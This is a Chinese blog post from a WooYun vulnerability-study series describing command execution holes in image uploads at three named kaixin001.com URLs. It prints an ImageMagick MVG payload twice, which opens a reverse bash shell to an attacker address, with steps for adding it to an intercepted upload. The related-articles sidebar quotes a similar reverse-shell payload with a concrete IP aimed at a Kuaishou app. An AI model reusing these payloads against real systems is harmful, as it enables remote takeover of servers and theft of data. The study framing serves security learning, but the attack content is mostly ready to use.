【漏洞学习——命令执行】开心网多处命令执行

最新推荐文章于 2022-10-23 18:08:44 发布
最新推荐文章于 2022-10-23 18:08:44 发布
阅读量467 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84646092
版权

漏洞细节

漏洞URL1:http://www.kaixin001.com/set/logo.php

在修改头像处,上传正常图片的时候抓包,把下面这个payload直接添加上去就可以直接反弹shell

push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context

漏洞URL2:http://www.kaixin001.com/photo/upload.php
漏洞URL3:http://www.kaixin001.com/lifetime/perfect.php

上传图片处

用以下payload

push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context

上传一个正常的照片,然后抓包添加payload,上传之后可反弹shell

参见:https://bugs.shuimugan.com/bug/view?bug_no=214606

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
EC_Carrot的博客
05-27 589
漏洞背景 Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal 8.0.0版本至8.3.4之前版本中存在远程代码执行漏洞,该漏洞源于PECL YAML解析器没有安全的处理PHP对象。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。 影响版本 Drupal Drupal 8.0.0 - 8.3.4 漏洞复现 我这里用的是vulhub的环境,需要基础配置,我这里也会放出来: #获得一个靶机的shell交互界面,CONTAINER换成自己的
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2080
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
ImageMagick 命令执行漏洞
mirror97black的博客
12-20 2283
ImageMagick 命令执行漏洞
ImageMagick漏洞演示
hello_simon的专栏
05-05 2476
centos安装 wgethttp://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with
Go代码审计:Gitea远程命令执行漏洞
02-24
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,gitobjects和....
第一节 命令执行介绍-01
最新发布
09-15
命令执行漏洞是一种常见的 Web 应用程序漏洞,指的是攻击者可以通过用户输入来执行恶意系统命令,导致服务器或系统敏感信息泄露、被植入木马、被控制等严重后果。下面是命令执行漏洞的相关知识点: 一、命令执行...
命令执行+CSRF
06-11
在IT安全领域,命令执行和CSRF(Cross-Site Request Forgery,跨站请求伪造)是两种常见的漏洞类型,它们对系统的安全性构成严重威胁。在渗透测试中,了解并掌握这两种漏洞的原理、识别方法以及防范策略至关重要。 ...
深入浅析ImageMagick命令执行漏洞
09-21
然而,ImageMagick的一个严重安全问题在于它的命令执行漏洞,这可能导致远程攻击者通过构造带有恶意代码的图片文件,执行任意系统命令,从而对服务器造成威胁。 漏洞的根源在于ImageMagick处理HTTPS格式文件的方式...
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2285
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个站:
PHP实例开发源码——AKCMS政府站系统 php版GBK.zip
11-30
PHP实例开发源码——AKCMS政府站系统 php版GBK.zip
Android动态命令执行漏洞,快手APP存在命令执行漏洞
weixin_29099729的博客
05-26 411
app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'pop graphic-contextcode 区域POST /rest...
ImageMagick远程代码执行漏洞分析
fly小灰灰的专栏
08-12 7765
1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9
Core Graphic(二):context详解
程小龙
02-16 2230
上一篇介绍了CG的历史 context是Quartz的核心概念,在用CG进行画图的时候,必须和context打交道,所以必须要知道context是什么,干什么以及为什么要有context。 我们使用CG最基本的操作就是创建路径,路径是一个用数学描述的图形形状,路径可以是矩形的,圆形的,牛仔帽形甚至是一个泰姬陵的形状。路径内可以用颜色进行填充,每一个像素点都可以被设置成特定的颜色。路径也可以是一
ImageMagick再爆核心漏洞 站长小心
weixin_34268843的博客
09-01 151
目前所有版本的GraphicsMagick和ImageMagick都支持打开文件,当文件名的第一个字符为“|”,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。 文件打开操作位于源代码文件blob.c中的OpenBlob()函数,不同于CVE-2016-3714的是,此漏洞存在于软件处理的核心代码中。 绿盟科技威胁预警级别 高级:影...
内容管理系统Drupal提出重大安全漏洞
weixin_34311757的博客
02-23 396
2019独角兽企业重金招聘Python工程师标准>>> ...
命令执行和代码执行漏洞
谢公子的博客
12-06 1万+
远程代码执行漏洞 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 修复方案:禁用 eval(),system()等可以执行命令的函数。如果一定要使用这些函数,则需要对用户的输入数据进行处理。此外,在PHP/JSP中...
代码注入漏洞以及修复方法
热门推荐
pygain的博客
10-12 1万+
PHP代码执行漏洞指应用程序本身过滤不严格,用户可以通过请求将代码注入到程序中执行,类似于SQL注入漏洞,可以把SQL语句通过页注入到SQL服务执行,而PHP代码执行漏洞则是可以把代码注入应用到站后端中,如果漏洞没有特殊的过滤,相当于直接有一个web后门存在,该漏洞主要由动态代码执行函数的参数过滤不严格导致。
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3274
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Web攻防:01章命令执行漏洞原理与防范
在第一节《命令执行介绍-01》中,我们深入探讨了Web应用程序中的命令执行漏洞这一关键概念。命令执行漏洞是指Web应用在处理用户输入时,未能对用户提供的数据进行充分过滤或净化,导致这些输入被误用为系统命令并在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值